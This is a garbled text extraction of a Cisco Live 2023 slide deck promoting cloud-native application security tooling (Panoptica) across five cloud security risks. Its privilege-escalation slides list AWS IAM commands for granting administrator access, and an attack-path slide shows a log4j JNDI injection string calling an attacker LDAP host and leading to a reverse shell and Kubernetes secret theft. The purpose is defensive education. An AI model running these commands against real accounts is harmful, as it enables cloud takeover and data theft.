為什么你需要盡快獲得CNAPP.pdf

《為什么你需要盡快獲得CNAPP.pdf》由會員分享，可在線閱讀，更多相關《為什么你需要盡快獲得CNAPP.pdf（108頁珍藏版）》請在三個皮匠報告上搜索。

1、#CiscoLive#CiscoLiveTim Szigeti,Principal Technical Marketing Engineertim_szigetiBRKETI-2903a.k.a.Why You Need a CNAPP ASAP!The Five Biggest Security Nightmares Waiting to Happen to Your Cloud Applications and How to Protect Your Business from Them 2023 Cisco and/or its affiliates.All rights reserve

2、d.Cisco Public#CiscoLiveEnter your personal notes hereCisco Webex App 3Questions?Use Cisco Webex App to chat with the speaker after the sessionFind this session in the Cisco Live Mobile App(BRKETI-2903)Click“Join the Discussion”Install the Webex App or go directly to the Webex spaceEnter messages/qu

3、estions in the Webex spaceHowWebex spaces will be moderated by the speaker until June 9,2023.12343https:/ 2023 Cisco and/or its affiliates.All rights reserved.Cisco PublicBRKETI-2903Agenda 2023 Cisco and/or its affiliates.All rights reserved.Cisco PublicIntroduction to 5 Cloud Security Nightmares1)E

4、xploitable APIs2)Misconfigured Infrastructure3)Privilege Escalations4)Advanced Attack Paths5)New Critical VulnerabilitiesSummary and Key TakeawaysBRKETI-29034Introduction 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLive“More than 85%of organizations will embrace a cloud-fi

5、rst principle by 2025 and will not be able to fully execute on their digital strategies without the use of cloud-native architectures and technologies”-Gartner“Use of Cloud-Native Technologies Will Be Pervasive,not Just Popular”BRKETI-29036 2023 Cisco and/or its affiliates.All rights reserved.Cisco

6、Public#CiscoLiveLegacy(Monolithic)Application Architecture7ApplicationHardwareOperating SystemBRKETI-2903 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLiveLegacy Application SecurityApplicationHardwareOperating SystemHardwareOperating SystemHypervisorVirtual MachineApplicat

7、ionVirtual MachineApplication8BRKETI-2903 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLiveLegacy Application SecurityHardwareOperating SystemHypervisorVirtual MachineApplicationVirtual MachineApplication9BRKETI-2903ApplicationHardwareOperating System 2023 Cisco and/or its

8、affiliates.All rights reserved.Cisco Public#CiscoLiveApplication Architecture Evolution10ApplicationHardwareOperating SystemBRKETI-2903 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLiveApplication Architecture EvolutionCloud NativeAPIAPIAPIAPIgRPCTCP11BRKETI-2903 2023 Cisco

9、 and/or its affiliates.All rights reserved.Cisco Public#CiscoLiveCloud Native Security Challenges:How Do You Secure Apps That Look Like This?12BRKETI-2903 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLiveCloud Native Security Challenges:How Do You Secure Apps That Look Like

10、 This?13BRKETI-2903 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLiveProtecting Apps from Development to Runtime14BRKETI-2903 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLive15BRKETI-2903Protecting Apps from Development to Runtime 2023 Cisco and/o

11、r its affiliates.All rights reserved.Cisco Public#CiscoLive16BRKETI-2903Monitor Operate Deploy Release Test Build Code Plan Protecting Apps from Development to Runtime 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLiveRuntimeSecOpsSecurity Commonly Remains an Afterthought17B

12、RKETI-2903Monitor Operate Deploy Release Test Build Code Plan Evaluate Security Posture 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLiveRuntimeDeploymentDevelopmentDevOpsAppDevSecOpsShift-Left Goal for Cloud Native App Security18BRKETI-2903Monitor Operate Deploy Release Te

13、st Build Code Plan Provide Security Insights&Tools for DevOpsProvide Security Insights&Tools for DevelopersProvide Security Insights&Tools for SecOps 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLiveRuntimeDeploymentDevelopmentDevOpsAppDevSecOps19Cloud Native Application Se

14、curity VulnerabilitiesBRKETI-2903Monitor Operate Deploy Release Test Build Code Plan Advanced MultiAdvanced Multi-Vector AttacksVector AttacksArtifact VulnerabilitiesArtifact VulnerabilitiesSoftware Vulnerabilities and ExposuresSoftware Vulnerabilities and ExposuresInfrastructure as Code(Infrastruct

15、ure as Code(IacIac)Vulnerabilities&ExposureVulnerabilities&ExposureCloud Security PostureCloud Security PostureWorkload VulnerabilitiesWorkload VulnerabilitiesRuntime ExposuresRuntime ExposuresKubernetes Security PostureKubernetes Security PostureInfrastructure Entitlements and PrivilegesInfrastruct

16、ure Entitlements and PrivilegesNetwork Configuration,Segmentation,and PolicyNetwork Configuration,Segmentation,and PolicyAPI VulnerabilitiesAPI Vulnerabilities 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLiveHow Serious is the Problem?20BRKETI-2903Sources:1.IBM Cost of a D

17、ata Breach Report 2022,2.McKinsey Cyber Security Trends 2022,3.Gartners estimate,4.Morgan Stanley(Dec22)$10.5Tforecast of global costs in cybercrime by 20252$4.3Maverage cost of a breach in 2022,which is a 20%increase from 2017199%of cloud failures are due to cloudmisconfigurations32%share of securi

18、ty spend from Cloud spend(vs.7-10%for broader IT)4 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLive21Secure the code to production stackSecure the code to production stackDevSecOpsbest practices.Practiced by everyone.Securethe logic of your appSecureyour workloadworkloadSe

19、curethe cloud resources cloud resources it runs onfrom development to productionfrom development to productionDevDeployRuntimeDeveloper influence(shift-left)SecOps influence(shift-right)BRKETI-2903 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLive22Prioritize with precision

20、.Remediate the risks that matterfirst.Attack Path Attack Path Analysis Analysis Cloud Security Posture ManagementAutomate and Simplify:Compliance MonitoringResource ManagementCloud Workload ProtectionContinuous Risk Management:Virtual MachinesContainersServerlessCode+Build SecurityPrioritize and Rem

21、ediate:Full Development LifecycleGovernance PoliciesInfrastructure as CodeApp+API SecurityAssess and Monitor:Internal&External APIsAPI TokensBRKETI-2903Nightmare#1:New Critical Vulnerabilities 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLiveBRKETI-290324 2023 Cisco and/or

22、its affiliates.All rights reserved.Cisco Public#CiscoLive25BRKETI-2903 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLiveHow Serious is the Problem?26BRKETI-2903Source:Orca 2022 State of Public Cloud Security Report78%of identified attack paths use known vulnerabilities(CVEs

23、)as an initial access attack vectorDemo:Detecting Software Vulnerabilities and Exposures 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLiveSoftware Vulnerability DetectionBRKETI-290328 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLiveSoftware Vulner

24、ability DetectionBRKETI-290329 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLiveSoftware Bill of Materials(SBOM)BRKETI-290330 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLiveSoftware Vulnerability DetectionBRKETI-290331 2023 Cisco and/or its affil

25、iates.All rights reserved.Cisco Public#CiscoLiveSoftware Image ScanningBRKETI-290332 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLiveSoftware Bill of Materials(SBOM)Graph QueryBRKETI-290333 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLiveSoftware

26、 Vulnerability Exposure Attack PathBRKETI-290334 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLiveMalware Infections35BRKETI-2903 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLive36Attack Path DashboardBRKETI-2903 2023 Cisco and/or its affiliates.A

27、ll rights reserved.Cisco Public#CiscoLive37Attack Path DashboardBRKETI-2903 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLiveCritical Malware Infections38BRKETI-2903 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLiveCritical Vulnerabilities39BRKETI-

28、2903 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLiveCritical VulnerabilitiesAttack Path Details40BRKETI-2903 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLiveRuntimeDeploymentDevelopmentDevOpsAppDevSecOps41Cloud Native Security Requirements and T

29、oolsetsBRKETI-2903Monitor Operate Deploy Release Test Build Code Plan Artifact ScanningArtifact ScanningSoftware Composition Analysis(SCA)Software Exposure ScanningSoftware Exposure ScanningCommon Vulnerabilities and Exposures(CVEs)Runtime ProtectionRuntime ProtectionCloud Workload Protection Platfo

30、rm(CWPP)Nightmare#2:Exploited APIs 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLiveOpenAPI Spec(Swagger)Anatomy of an API(Application Programming Interface)43BRKETI-2903frontendPOST/reservationrequest data(JSON)response data(JSON)header data(key/value)GET/reservation/moidh

31、eader data(key/value)response data(JSON)AuthNAuthNAuthZAuthZbookings 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLiveVulnerable Software ComponentsSecurity of an APISoftware&Transport Concernsfrontenduser/frontend:1.1base-imageruntime-engineapplication-codetcp/443mTLSPermi

32、tted Cnxn(L3)Permitted Cnxn(L7)Permitted Cnxn(Sec)OpenAPI Spec(Swagger)POST/reservationrequest data(JSON)response data(JSON)header data(key/value)GET/reservation/moidheader data(key/value)response data(JSON)AuthNAuthNAuthZAuthZbookingsBRKETI-290344 2023 Cisco and/or its affiliates.All rights reserve

33、d.Cisco Public#CiscoLiveSecurity of an APIApplication Layer(L7)ConcernsfrontendAuthN TokenSpec AnalysisBroken Object Level AuthZBroken Function Level AuthZOpenAPI Spec(Swagger)POST/reservationrequest data(JSON)response data(JSON)header data(key/value)GET/reservation/moidheader data(key/value)respons

34、e data(JSON)AuthNAuthNAuthZAuthZbookingsBRKETI-290345 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLiveHow Serious is the Problem?46BRKETI-2903Source:Gartner&Salt286%quarterly increasein API attacks in 2022#1API attacks will become the most-frequent attack vector20%of organ

35、izations have experienced a breach resulting from insecure APIsDemo:Detecting&Protecting Against API Exploits 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLive48API Security DashboardBRKETI-2903 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLive49AP

36、I Risk Finding SummaryBRKETI-2903 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLive50Internal API AnalysisBRKETI-2903 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLive51Internal API Analysis(cont)BRKETI-2903 2023 Cisco and/or its affiliates.All rig

37、hts reserved.Cisco Public#CiscoLive52Internal API Analysis(cont)BRKETI-2903 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLive53External/Third-Party API AnalysisBRKETI-2903 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLive54External/Third-Party API

38、Analysis(cont)BRKETI-2903 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLiveAPI and Connection Policies55BRKETI-2903 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLiveRuntimeDeploymentDevelopmentDevOpsAppDevSecOps56Cloud Native Security Requirements

39、and ToolsetsBRKETI-2903Monitor Operate Deploy Release Test Build Code Plan Artifact ScanningArtifact ScanningSoftware Composition Analysis(SCA)API security analysisSoftware Exposure ScanningSoftware Exposure ScanningCommon Vulnerabilities and Exposures(CVEs)Runtime ProtectionRuntime ProtectionCloud

40、Workload Protection Platform(CWPP)API protectionNightmare#2:Misconfigured Infrastructure 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLiveTesla Cryptojacking AttackExploit of Public Facing Assets&Embedded SecretsAttackerAny IPKey PairIAM AccountCryptominingScriptsS3 BucketS

41、ource:Redlock Reporthttps:/blog.redlock.io/cryptojacking-teslaEC2 InstanceBRKETI-290358 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLivePegasus Airlines Data BreachExploit of Public Facing Unprotected DataAttackerAny IPS3 BucketSource:SafetyDetectives Pegasus Leak Reportht

42、tps:/ S3 Bucket contained an“Electronic Flight Bag”(EFB).This included the source code of the software their pilots use for all aircraft operations,as well as all related data,including:Flight chartsnavigation materialstakeoff/landing,refueling,and safety proceduresDetails relating to various other

43、in-flight processesThe bucket also contained plain-text passwords and secret keys that someone could use to tamper with extra-sensitive filesAdditionally,1.6M files of crew PII,including photos of staff and their signatures were leakedIn total,almost 23 million files were found on the bucket,totalin

44、g around 6.5 TB of data.This exposure could have impacted the safety of every Pegasus passenger and crew member around the world.Affiliated airlines that are using PegasusEFB could also have been affected.BRKETI-290359 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLiveHow Se

45、rious is the Problem?60BRKETI-2903Source:Orca 2022 State of Public Cloud Security Report70%of organizations have a Kubernetes API server that is publicly accessible72%of organizations have at least one S3 bucket that allows public“read”access36%of organizations keep unencrypted secrets and personall

46、y identifiable information(PII)in these cloud services.Demo:Detecting Misconfigurations,Embedded Secrets and Exposed Data 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLive62Recon.cloudBRKETI-2903 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLive63C

47、onfiguration IssuesBRKETI-2903 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLive64Exposed SecretsBRKETI-2903 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLive65Exposed Data(e.g.S3 Buckets)BRKETI-2903 2023 Cisco and/or its affiliates.All rights rese

48、rved.Cisco Public#CiscoLive66Attack PathsConfiguration RisksBRKETI-2903 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLive67Attack PathsExposed SecretsBRKETI-2903 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLive68Exposed SecretsAttack Path DetailBR

49、KETI-2903 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLiveRuntimeDeploymentDevelopmentDevOpsAppDevSecOps69Cloud Native Security Requirements and ToolsetsBRKETI-2903Monitor Operate Deploy Release Test Build Code Plan Artifact ScanningArtifact ScanningSoftware Composition An

50、alysis(SCA)API security analysisSoftware Exposure ScanningSoftware Exposure ScanningCommon Vulnerabilities and Exposures(CVEs)Runtime ProtectionRuntime ProtectionCloud Workload Protection Platform(CWPP)API protectionCloud Configuration HardeningCloud Configuration HardeningKubernetes Security Postur

51、e Management(KSPM)Cloud Security Posture Management(CSPM)Nightmare#4:Privilege Escalations 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLivePrivilege Escalation ExampleStep 1:Create a New User71BRKETI-2903 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#Ci

52、scoLivePrivilege Escalation ExampleStep 2:Permit the“PutUserPolicy”Action72BRKETI-2903 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLivePrivilege Escalation ExampleStep 3:Create a JSON Policy with Full Action Permissions(e.g.“AdminPriv.json”)73BRKETI-2903 2023 Cisco and/or

53、its affiliates.All rights reserved.Cisco Public#CiscoLivePrivilege Escalation ExampleStep 4:Apply the New Policy to the New User74BRKETI-2903szigetiSZIGETI-M-G9KV bin%aws iam put-user-policy-user-name test_user_privilege_escalation-policy-name AdminPriv-policy-document file:/Users/szigeti/Desktop/Ad

54、minPriv.json-profile privilegedszigetiSZIGETI-M-G9KV bin%New User AccountNew Policy(i.e.full admin rights)2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLiveAdditional Privilege Escalation ExamplesCreating a new policy versionaws iam create-policy-version policy-arn target_po

55、licy_arn policy-document file:/path/to/administrator/policy.json set-as-defaultSetting the default policy version to an existing versionaws iam set-default-policy-version policy-arn target_policy_arn version-id v2Creating an EC2 instance with an existing instance profileaws ec2 run-instances image-i

56、d ami-a4dc46db instance-type t2.micro iam-instance-profile Name=iam-full-access-ip key-name my_ssh_key security-group-ids sg-123456Creating a new user access keyaws iam create-access-key user-name target_userCreating a new login profileaws iam create-login-profile user-name target_user password|3rxY

57、GGl368)O,-$1B”zKejZZ.X1;6Tf;/CQQeXSoth)KZ7v?hq.#dh49=fT;|,lyTKOLG7JqH$LV5U9OZ”,jJiT-D(no-password-reset-requiredUpdating an existing login profileaws iam update-login-profile user-name target_user password|3rxYGGl368)O,-$1B”zKejZZ.X1;6Tf;/CQQeXSoth)KZ7v?hq.#dh49=fT;|,lyTKOLG7JqH$LV5U9OZ”,jJiT-D(no-p

58、assword-reset-required75BRKETI-2903Source:Rhino Security Labs 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLiveAdditional Privilege Escalation Examples(cont)Attaching a policy to a useraws iam attach-user-policy user-name my_username policy-arn arn:aws:iam:aws:policy/Admini

59、stratorAccessAttaching a policy to a groupaws iam attach-group-policy group-name group_i_am_in policy-arnarn:aws:iam:aws:policy/AdministratorAccessAttaching a policy to a roleaws iam attach-role-policy role-name role_i_can_assume policy-arnarn:aws:iam:aws:policy/AdministratorAccessCreating/updating

60、an inline policy for a useraws iam put-user-policy user-name my_username policy-name my_inline_policy policy-document file:/path/to/administrator/policy.jsonCreating/updating an inline policy for a groupaws iam put-group-policy group-name group_i_am_in policy-name group_inline_policy policy-document

61、 file:/path/to/administrator/policy.jsonCreating/updating an inline policy for a roleaws iam put-role-policy role-name role_i_can_assume policy-name role_inline_policy policy-document file:/path/to/administrator/policy.json76BRKETI-2903Source:Rhino Security Labs 2023 Cisco and/or its affiliates.All

62、rights reserved.Cisco Public#CiscoLiveAdditional Privilege Escalation Examples(cont)Adding a user to a groupaws iam add-user-to-group group-name target_group user-name my_usernameUpdating the AssumeRolePolicyDocument of a roleaws iam update-assume-role-policy role-name role_i_can_assume policy-docum

63、ent file:/path/to/assume/role/policy.jsonPassing a role to a new Lambda function,then invoking itaws lambda create-function function-name my_function runtime python3.6 role arn_of_lambda_role handler lambda_function.lambda_handler code file:/my/python/code.pyPassing a role to a new Lambda function,t

64、hen triggering it with DynamoDBaws lambda create-function function-name my_function runtime python3.6 role arn_of_lambda_role handler lambda_function.lambda_handler code file:/my/python/code.pyUpdating the code of an existing Lambda functionaws lambda update-function-code function-name target_functi

65、on zip-file fileb:/my/lambda/code/zipped.zipPassing a role to Data Pipelineaws datapipeline create-pipeline name my_pipeline unique-id unique_stringaws datapipeline put-pipeline-definition pipeline-id unique_string pipeline-definition file:/path/to/my/pipeline/definition.json77BRKETI-2903Source:Rhin

66、o Security Labs 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLiveHow Serious is the Problem?78BRKETI-2903Source:Forrester80%of security breaches involve privileged credentialsDemo:Detecting Privilege Escalation Threats 2023 Cisco and/or its affiliates.All rights reserved.Ci

67、sco Public#CiscoLive80Identity RisksBRKETI-2903 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLive81Identity RisksOverview BRKETI-2903 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLive82Identity RisksDetailsBRKETI-2903 2023 Cisco and/or its affiliat

68、es.All rights reserved.Cisco Public#CiscoLiveIdentity RisksRemediation83BRKETI-2903 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLive84Identity RisksInvestigateBRKETI-2903 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLive85Identity RisksInvestigate

69、(cont)BRKETI-2903 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLive86Privilege Escalation Attack PathsBRKETI-2903 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLive87Privilege Escalation Attack Path DetailsBRKETI-2903 2023 Cisco and/or its affiliate

70、s.All rights reserved.Cisco Public#CiscoLiveRuntimeDeploymentDevelopmentDevOpsAppDevSecOps88Cloud Native Security Requirements and ToolsetsBRKETI-2903Monitor Operate Deploy Release Test Build Code Plan Artifact ScanningArtifact ScanningSoftware Composition Analysis(SCA)API security analysisSoftware

71、Exposure ScanningSoftware Exposure ScanningCommon Vulnerabilities and Exposures(CVEs)Runtime ProtectionRuntime ProtectionCloud Workload Protection Platform(CWPP)API protectionCloud Configuration HardeningCloud Configuration HardeningKubernetes Security Posture Management(KSPM)Cloud Security Posture

72、Management(CSPM)Cloud Infrastructure Entitlements Management(CIEM)Nightmare#6:Advanced Attack Paths 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLiveHow Serious is the Problem?90BRKETI-2903Source:Forrester3the average number of steps in an attack path to reach a crown jewel

73、 assetSource:Orca 2022 State of Public Cloud Security Report 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLiveMITRE ATT&CK Framework for CloudSource:https:/attack.mitre.org/matrices/enterprise/cloud/BRKETI-290391 2023 Cisco and/or its affiliates.All rights reserved.Cisco Pu

74、blic#CiscoLiveAdvanced AttackAbstract Example Source:https:/attack.mitre.org/matrices/enterprise/cloud/BRKETI-290392 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLiveAttackerUser Agent93Advanced AttackExample 1BRKETI-2903Front-EndUser APIOrder APIAny IPMongoDBAttackerLDAP S

75、erverAttackerpwncat1.Inject attacker LDAP server address:$(indi:ldap:/1.2.3.4:/1389/a)2.Attacker LDAP server address passed to User API3.Attacker LDAP server address passed to MongoDB4.Order API pod outputs triggers log4j vulnerability and receives instructions to connect to the LDAP server5.Order A

76、PI pod connects to Attacker LDAP server6.Attacker injects Java class and reverse shell commands7.Order API establishers a reverse shell to Attacker pwncat 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLiveAttackerUser Agent94Advanced AttackExample 1(cont)BRKETI-2903Front-End

77、IAM AccountK8s APIUser APIOrder APIAny IPMongoDBAttackerLDAP ServerAttackerpwncat8.Attacker installs kubectl(if absent)9.Attacker discovers pods and cluster roles via kubectl10.Attacker gets secrets and all service accounts via kubectl11.Attacker pulls the token from Order API to find the Kube API12

78、.Attacker pulls additional secrets from the Kube API service13.Attacker pulls the AWS STS key14.Attacker is now full control of the cluster andany other AWS resources managed by the AWS STS key 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLiveAttackerUser Agent95Advanced At

79、tackExample 2BRKETI-2903Any IP1.Attacker uses Shodan to find broken Jenkins pipelinesShodanAttackerpwncat 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLive96Shodan ReconnaissanceBRKETI-2903 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLiveAttackerU

80、ser Agent97Advanced AttackExample 2(cont)BRKETI-2903Any IP1.Attacker uses Shodan to find broken Jenkins pipelines2.Attacker connects to a broken Jenkins pipeline and updates the software assets and IaC Kubernetes YAML files to recreate the clusterrole with poisoned commands,including instructions to

81、 connect to the Attackers pwncat3.Poisoned software assets and/or IaC gets spun up any place in the world4.Poisoned software sets up a reverse shell to the Attacker pwncat for them to controlShodanAttackerpwncatDemo:Detecting Advanced Attack PathsSummary,Key Takeaways and Next Steps 2023 Cisco and/o

82、r its affiliates.All rights reserved.Cisco Public#CiscoLiveRuntimeDeploymentDevelopmentDevOpsAppDevSecOps100Cloud Native Security Requirements and ToolsetsBRKETI-2903Monitor Operate Deploy Release Test Build Code Plan Artifact ScanningArtifact ScanningStatic App Security Testing(SAST)Dynamic App Sec

83、 Testing(DAST)Software Composition Analysis(SCA)API security analysisSoftware Exposure ScanningSoftware Exposure ScanningCommon Vulnerabilities and Exposures(CVEs)SecretsSensitive DataMalwareInfrastructure as Code Infrastructure as Code(IacIac)ScanningScanningCloud Configuration HardeningCloud Confi

84、guration HardeningKubernetes Security Posture Management(KSPM)Cloud Security Posture Management(CSPM)Cloud Infrastructure Entitlements Management(CIEM)Network Configuration and Segmentation PolicyRuntime ProtectionRuntime ProtectionCloud Workload Protection Platform(CWPP)API protectionAttack Path An

85、alysisAttack Path AnalysisRuntime Exposure ScanningRuntime Exposure ScanningCVEsSecretsSensitive DataMalware 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLive101Next Steps:Start Using Panoptica for freeBRKETI-2903panoptica.app 2023 Cisco and/or its affiliates.All rights res

86、erved.Cisco Public#CiscoLive102Continue Your Cloud Native Security LearningBRKETI-2903 2023 Cisco and/or its affiliates.All rights reserved.Cisco PublicVisit Outshift in the World of Solutions!Take a picture of this slide and bring it to the Outshift booth in the World of Solutions.(#3307)Get your b

87、adge scanned to be entered into our daily drawing for an Apple iPad!Learn more about Panoptica!103BRKETI-2903 2023 Cisco and/or its affiliates.All rights reserved.Cisco Public#CiscoLiveFill out your session surveys!Attendees who fill out a minimum of four session surveys and the overall event survey

88、 will get Cisco Live-branded socks(while supplies last)!104BRKETI-2903These points help you get on the leaderboard and increase your chances of winning daily and grand prizesAttendees will also earn 100 points in the Cisco Live Challenge for every survey completed.2023 Cisco and/or its affiliates.Al

89、l rights reserved.Cisco PublicContinue your educationVisit the Cisco Showcase for related demosBook your one-on-oneMeet the Engineer meetingAttend the interactive education with DevNet,Capture the Flag,and Walk-in LabsVisit the On-Demand Library for more sessions at www.CiscoL you#CiscoLive 2023 Cis

90、co and/or its affiliates.All rights reserved.Cisco Public#CiscoLive107Gamify your Cisco Live experience!Get points Get points for attending this session!for attending this session!Open the Cisco Events App.Click on Cisco Live Challenge in the side menu.Click on View Your Badges at the top.Click the+at the bottom of the screen and scan the QR code:How:1234107 2023 Cisco and/or its affiliates.All rights reserved.Cisco PublicBRKETI-2903#CiscoLive